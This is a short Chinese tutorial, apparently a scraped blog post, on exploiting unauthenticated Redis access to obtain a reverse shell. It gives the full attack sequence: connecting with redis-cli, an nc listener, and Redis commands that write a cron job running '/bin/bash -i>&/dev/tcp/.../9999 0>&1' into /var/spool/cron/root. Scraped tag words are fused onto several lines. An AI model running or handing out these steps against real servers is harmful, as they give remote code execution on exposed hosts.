Redis未受权访问反弹shell

Redis未受权访问反弹shellredis

目标主机:10.104.11.178shell

攻击机:kalibash

攻击步骤:tcp

1.与目标主机链接code

root@kali:~# /usr/redis/redis-cli -h 10.104.11.178

 2.kali主机进行监听blog

nc -l -v  -p 9999

 

3.写入反弹shell语句class

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

 4.反弹shell链接成功cli

相关文章
相关标签/搜索